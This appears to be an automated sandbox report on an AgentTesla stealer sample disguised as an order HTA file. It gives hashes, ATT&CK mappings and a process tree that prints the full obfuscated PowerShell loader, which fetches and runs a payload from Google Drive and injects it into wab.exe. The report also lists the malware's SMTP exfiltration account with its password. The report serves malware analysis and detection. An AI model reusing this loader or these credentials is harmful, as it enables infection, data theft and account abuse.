agenttesla | e065b159b6204e982f96d2633ee450f52ef2adcda327656545eeb3160b4233e3

General

Target

New Order n. 4533452041, date 14.05.2024.hta
Size

424KB
MD5

41bfa760446594a9ad5d9cb19b9f80ca
SHA1

02ee45b860e1488cb3570d460dbba1e6eae6a226
SHA256

041f367ef3d1d7391917341bb6da3089f2534751a6dc10a8de23cf5196ae6a2d
SHA512

edc7d012d7ba64dee5461e2bd95e072bbec38852ae8d3a449a707f74136d1c8693c359e8bfc6a53b54900897f646fb87a3d7ac2054ff672ed352f30fd1332c5e
SSDEEP

6144:7+4t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+41:7JJv0ayfOb64MRycngoavbN0vBrbRMn

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.bunturaja.co.id
Port:
587
Username:
[email protected]
Password:
!@#$%,.Jakarta
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2760	powershell.exe
5	2760	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
3	drive.google.com
8	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	api.ipify.org
13	api.ipify.org
14	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1896	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2504	powershell.exe
1896	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2504 set thread context of 1896	2504	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2760	powershell.exe
2504	powershell.exe
2504	powershell.exe
1896	wab.exe
1896	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2504	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	1896	wab.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1560 wrote to memory of 2760	1560	mshta.exe	29
PID 1560 wrote to memory of 2760	1560	mshta.exe	29
PID 1560 wrote to memory of 2760	1560	mshta.exe	29
PID 1560 wrote to memory of 2760	1560	mshta.exe	29
PID 2760 wrote to memory of 2624	2760	powershell.exe	31
PID 2760 wrote to memory of 2624	2760	powershell.exe	31
PID 2760 wrote to memory of 2624	2760	powershell.exe	31
PID 2760 wrote to memory of 2624	2760	powershell.exe	31
PID 2760 wrote to memory of 2504	2760	powershell.exe	32
PID 2760 wrote to memory of 2504	2760	powershell.exe	32
PID 2760 wrote to memory of 2504	2760	powershell.exe	32
PID 2760 wrote to memory of 2504	2760	powershell.exe	32
PID 2504 wrote to memory of 2900	2504	powershell.exe	33
PID 2504 wrote to memory of 2900	2504	powershell.exe	33
PID 2504 wrote to memory of 2900	2504	powershell.exe	33
PID 2504 wrote to memory of 2900	2504	powershell.exe	33
PID 2504 wrote to memory of 1896	2504	powershell.exe	34
PID 2504 wrote to memory of 1896	2504	powershell.exe	34
PID 2504 wrote to memory of 1896	2504	powershell.exe	34
PID 2504 wrote to memory of 1896	2504	powershell.exe	34
PID 2504 wrote to memory of 1896	2504	powershell.exe	34
PID 2504 wrote to memory of 1896	2504	powershell.exe	34

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\New Order n. 4533452041, date 14.05.2024.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bygningsmssigt = 1;$Grundlags='Su';$Grundlags+='bstrin';$Grundlags+='g';Function Lamellaria110($Chronol){$Skibsskrue=$Chronol.Length-$Bygningsmssigt;For($Jellica65=1;$Jellica65 -lt $Skibsskrue;$Jellica65+=2){$Orientness+=$Chronol.$Grundlags.Invoke( $Jellica65, $Bygningsmssigt);}$Orientness;}function Ufuldbaarnes($Fireboy180){.($Intertrochanteric) ($Fireboy180);}$Tilbjeligste=Lamellaria110 '.M oIz i lMlDak/ 5 . 0O t(.WSi n d,oDw s. ,NBTM G1b0F..0 ;r .WSi,nB6 4 ;, xs6p4,;S Sr vD:M1T2A1D.T0P), eGRe cLk oG/ 2B0P1J0,0U1,0 1, FTi rPe fGo x /.1K2 1a.K0Z ';$Sgestiers=Lamellaria110 ' UFs.e r.-.AGg e n tS ';$Spillelrerindernes=Lamellaria110 'Ph.tDt,pAsP: /E/ dTr.i,v e .Lg,o o.g l e,. cLo mU/ u c ?ZeZxAp o rNt,= d.olwBnFl o aad & i.dT=A1IZTySN xPg TMDNKTE,X E,pMSRHBIFjTn 8So OtAAPAG wNQphR0CdLP WWs n ';$Inconsolableness=Lamellaria110 's> ';$Intertrochanteric=Lamellaria110 ',iIeCxO ';$peppily='Prgtigstes';Ufuldbaarnes (Lamellaria110 'RSPe tg-NCnoMn t eTnEt. M- P.ast.hP Tu: \WL n.p aKu sKe r s . t.x.tA A-CVHaTlSuCe, $.p e p pPi l,y,;v ');Ufuldbaarnes (Lamellaria110 ' i.f B(bt,e s tS- p.a t h ,T :J\,LGn p.aFuGsVeDr,sO.wt,xGtR)E{ e x,iOtV} ;, ');$Opnaaelig = Lamellaria110 'OeBc hRo A%.a,pRpSd aNt.a %.\OG e d,dTeDfFaIrCs e rBsS.pF o r &N&U NeFcghAoT $. ';Ufuldbaarnes (Lamellaria110 'F$Cg lfoKb.a.l :DF.rbaGmPeNs t.oLrBeB=M(,cKm d ,/ c, $eO.pFnsa aSeSl iSg ) ');Ufuldbaarnes (Lamellaria110 ' $Dg lBocbNaBl.:saGn kNeDtDi lKl aCd.e,l,sFe n = $ SDp irl l,ePlPr e r i nydTe r n e sV.,sBpOlBi t (B$EI nSc,o nGsHoAlPa,b,lLeMnAe sSs ). ');$Spillelrerindernes=$anketilladelsen[0];Ufuldbaarnes (Lamellaria110 'L$FgOlAo b.a l.: OHv e rgs t t eHrNtTe oRrBide rN= NSeEw -.O bHjKe c,t sS.yBs tDeKm,.MNDeSt,.CW ePbHCDl i,e nRt. ');Ufuldbaarnes (Lamellaria110 'L$SOBvVeArCsLtGt e r t.e,oDr,i ePrF. H eGa d.e.r.sB[ $,SDg.e sFt i,eRr,sT].=C$.T iPl.bEj.eMl iFgFs.tFeB ');$Pictographs=Lamellaria110 'POPvOeBr s t.tFeTratGeKo rOi.e r . D o.wNnVlEoTa d,FPi l eb(o$,SAp iSlAlPe l,rSe.r i nMd eFr nKeUsJ,R$,A fGsSetnBd.eSrAe nV)M ';$Pictographs=$Framestore[1]+$Pictographs;$Afsenderen=$Framestore[0];Ufuldbaarnes (Lamellaria110 '.$Ag lToAbCaSl :GB uUl l,rKo.a,r e r =F(ET e,s th- PMa,tBhL ,$ ABfMsFeFnFdLeAr.eFnF)C ');while (!$Bullroarer) {Ufuldbaarnes (Lamellaria110 'B$ g lToUb a l :SS,p.i nFdMe,r.iMeFtUsV=a$ tSr.uFe. ') ;Ufuldbaarnes $Pictographs;Ufuldbaarnes (Lamellaria110 'SS.tSaerhtW-RS,lCeBe pT 4C ');Ufuldbaarnes (Lamellaria110 ',$DgUlSo,b,a,lI: B uTlFl r oPaDrAe.rC=D( T eBs,t -,PSa.tPhS R$ A f sWetn d eAr.e n )S ') ;Ufuldbaarnes (Lamellaria110 'P$ g l oCb.a l,: F o r n a,m.mSeBsD=,$ gTlBo.b a.lO:KB aHnCkTe dPeF+ +,%H$Ca,n k eDtTiPl lAa dUe l.sGe nD. cPomuSnFt ') ;$Spillelrerindernes=$anketilladelsen[$Fornammes];}$Atlassene=362597;$Feathering=26398;Ufuldbaarnes (Lamellaria110 ' $ g,l o,bCa l :.E k s iMsBt.e.n sJmCiOn iRm.a e,nBeIsj M=S SG eDtF- C osn,tOeSn.tC c$ Apf,sReUn dCe r e nP ');Ufuldbaarnes (Lamellaria110 'K$ g l.o b a lP:Gg aBnLdIhUiBi.s mU .=A W[NS yRsotCe m,..CPotn vEeHr t ]O: : F,rMo mBB aDsVe 6m4TS.tHr,iTn gM(F$wE kEseiJsEt.e,nHs m i nPi,mRa,e nMe,sK)H ');Ufuldbaarnes (Lamellaria110 'L$,g lJopbMaBlt:Sb.n f aSl,dPeOs =, t[ES y s tteAmU..T eIx.t..IE nFcSoIdAi,n.g,]P: :BAHS C,IPI .,GSe tSSLtErUiBn gM(.$ gHaHn d,hTiRi sPmM) ');Ufuldbaarnes (Lamellaria110 'R$PgplIo,b aKlS: BPu.rNrOeEtQaCvOl e,=,$Fb.n.f.aFl,d.eSs .bs.uAbCsCt r.i njgA( $PA tHl ans sSe.nRe , $ FGeMa tBhAe r.iLn gR) ');Ufuldbaarnes $Burretavle;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Geddefarsers.For && echo $"
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bygningsmssigt = 1;$Grundlags='Su';$Grundlags+='bstrin';$Grundlags+='g';Function Lamellaria110($Chronol){$Skibsskrue=$Chronol.Length-$Bygningsmssigt;For($Jellica65=1;$Jellica65 -lt $Skibsskrue;$Jellica65+=2){$Orientness+=$Chronol.$Grundlags.Invoke( $Jellica65, $Bygningsmssigt);}$Orientness;}function Ufuldbaarnes($Fireboy180){.($Intertrochanteric) ($Fireboy180);}$Tilbjeligste=Lamellaria110 '.M oIz i lMlDak/ 5 . 0O t(.WSi n d,oDw s. ,NBTM G1b0F..0 ;r .WSi,nB6 4 ;, xs6p4,;S Sr vD:M1T2A1D.T0P), eGRe cLk oG/ 2B0P1J0,0U1,0 1, FTi rPe fGo x /.1K2 1a.K0Z ';$Sgestiers=Lamellaria110 ' UFs.e r.-.AGg e n tS ';$Spillelrerindernes=Lamellaria110 'Ph.tDt,pAsP: /E/ dTr.i,v e .Lg,o o.g l e,. cLo mU/ u c ?ZeZxAp o rNt,= d.olwBnFl o aad & i.dT=A1IZTySN xPg TMDNKTE,X E,pMSRHBIFjTn 8So OtAAPAG wNQphR0CdLP WWs n ';$Inconsolableness=Lamellaria110 's> ';$Intertrochanteric=Lamellaria110 ',iIeCxO ';$peppily='Prgtigstes';Ufuldbaarnes (Lamellaria110 'RSPe tg-NCnoMn t eTnEt. M- P.ast.hP Tu: \WL n.p aKu sKe r s . t.x.tA A-CVHaTlSuCe, $.p e p pPi l,y,;v ');Ufuldbaarnes (Lamellaria110 ' i.f B(bt,e s tS- p.a t h ,T :J\,LGn p.aFuGsVeDr,sO.wt,xGtR)E{ e x,iOtV} ;, ');$Opnaaelig = Lamellaria110 'OeBc hRo A%.a,pRpSd aNt.a %.\OG e d,dTeDfFaIrCs e rBsS.pF o r &N&U NeFcghAoT $. ';Ufuldbaarnes (Lamellaria110 'F$Cg lfoKb.a.l :DF.rbaGmPeNs t.oLrBeB=M(,cKm d ,/ c, $eO.pFnsa aSeSl iSg ) ');Ufuldbaarnes (Lamellaria110 ' $Dg lBocbNaBl.:saGn kNeDtDi lKl aCd.e,l,sFe n = $ SDp irl l,ePlPr e r i nydTe r n e sV.,sBpOlBi t (B$EI nSc,o nGsHoAlPa,b,lLeMnAe sSs ). ');$Spillelrerindernes=$anketilladelsen[0];Ufuldbaarnes (Lamellaria110 'L$FgOlAo b.a l.: OHv e rgs t t eHrNtTe oRrBide rN= NSeEw -.O bHjKe c,t sS.yBs tDeKm,.MNDeSt,.CW ePbHCDl i,e nRt. ');Ufuldbaarnes (Lamellaria110 'L$SOBvVeArCsLtGt e r t.e,oDr,i ePrF. H eGa d.e.r.sB[ $,SDg.e sFt i,eRr,sT].=C$.T iPl.bEj.eMl iFgFs.tFeB ');$Pictographs=Lamellaria110 'POPvOeBr s t.tFeTratGeKo rOi.e r . D o.wNnVlEoTa d,FPi l eb(o$,SAp iSlAlPe l,rSe.r i nMd eFr nKeUsJ,R$,A fGsSetnBd.eSrAe nV)M ';$Pictographs=$Framestore[1]+$Pictographs;$Afsenderen=$Framestore[0];Ufuldbaarnes (Lamellaria110 '.$Ag lToAbCaSl :GB uUl l,rKo.a,r e r =F(ET e,s th- PMa,tBhL ,$ ABfMsFeFnFdLeAr.eFnF)C ');while (!$Bullroarer) {Ufuldbaarnes (Lamellaria110 'B$ g lToUb a l :SS,p.i nFdMe,r.iMeFtUsV=a$ tSr.uFe. ') ;Ufuldbaarnes $Pictographs;Ufuldbaarnes (Lamellaria110 'SS.tSaerhtW-RS,lCeBe pT 4C ');Ufuldbaarnes (Lamellaria110 ',$DgUlSo,b,a,lI: B uTlFl r oPaDrAe.rC=D( T eBs,t -,PSa.tPhS R$ A f sWetn d eAr.e n )S ') ;Ufuldbaarnes (Lamellaria110 'P$ g l oCb.a l,: F o r n a,m.mSeBsD=,$ gTlBo.b a.lO:KB aHnCkTe dPeF+ +,%H$Ca,n k eDtTiPl lAa dUe l.sGe nD. cPomuSnFt ') ;$Spillelrerindernes=$anketilladelsen[$Fornammes];}$Atlassene=362597;$Feathering=26398;Ufuldbaarnes (Lamellaria110 ' $ g,l o,bCa l :.E k s iMsBt.e.n sJmCiOn iRm.a e,nBeIsj M=S SG eDtF- C osn,tOeSn.tC c$ Apf,sReUn dCe r e nP ');Ufuldbaarnes (Lamellaria110 'K$ g l.o b a lP:Gg aBnLdIhUiBi.s mU .=A W[NS yRsotCe m,..CPotn vEeHr t ]O: : F,rMo mBB aDsVe 6m4TS.tHr,iTn gM(F$wE kEseiJsEt.e,nHs m i nPi,mRa,e nMe,sK)H ');Ufuldbaarnes (Lamellaria110 'L$,g lJopbMaBlt:Sb.n f aSl,dPeOs =, t[ES y s tteAmU..T eIx.t..IE nFcSoIdAi,n.g,]P: :BAHS C,IPI .,GSe tSSLtErUiBn gM(.$ gHaHn d,hTiRi sPmM) ');Ufuldbaarnes (Lamellaria110 'R$PgplIo,b aKlS: BPu.rNrOeEtQaCvOl e,=,$Fb.n.f.aFl,d.eSs .bs.uAbCsCt r.i njgA( $PA tHl ans sSe.nRe , $ FGeMa tBhAe r.iLn gR) ');Ufuldbaarnes $Burretavle;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2504
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Geddefarsers.For && echo $"
      4⤵
      PID:2900
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Geddefarsers.For

Filesize
506KB

MD5
6664c38cad5cd3c4f546f3e144c9166b

SHA1
a7acbb9d0c21684a1c31e1f04c389855aa3e621a

SHA256
d557ebf7522ed213fdb7f00da07cc817767a45b830cfdb517eaf751d5e97b2b2

SHA512
9255299f22227d2f275e43a1bbd0444cbb37380085a9a1b82e85bf8df218089ac67b8ad0d6391e188948001ae306948f8739f66164d71b44096dbbb17e168ae0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e3686003b728c07810e2cb85b1ce9c0b

SHA1
c8315fc63493f28aa090ce0fee9825d71f8fc7a0

SHA256
835c313762fad6fc37b92ad59b2b1fad6d8db4370f9d85a14704fd9d443641e8

SHA512
b0c63fad070c8117217149e173cc67b063ef1fc9b3addc73ce89457015fe209b0514fb639b5752c99d3cf34d00b6566f92511fbd5366192fa9c50c28b4280c8e

Download Submit
memory/1896-38-0x0000000000680000-0x00000000016E2000-memory.dmp

Filesize
16.4MB

Download
memory/1896-39-0x0000000000680000-0x00000000016E2000-memory.dmp

Filesize
16.4MB

Download
memory/1896-40-0x0000000000680000-0x00000000006C2000-memory.dmp

Filesize
264KB

Download
memory/2504-15-0x0000000006790000-0x0000000009C53000-memory.dmp

Filesize
52.8MB

Download

Analysis

Sharing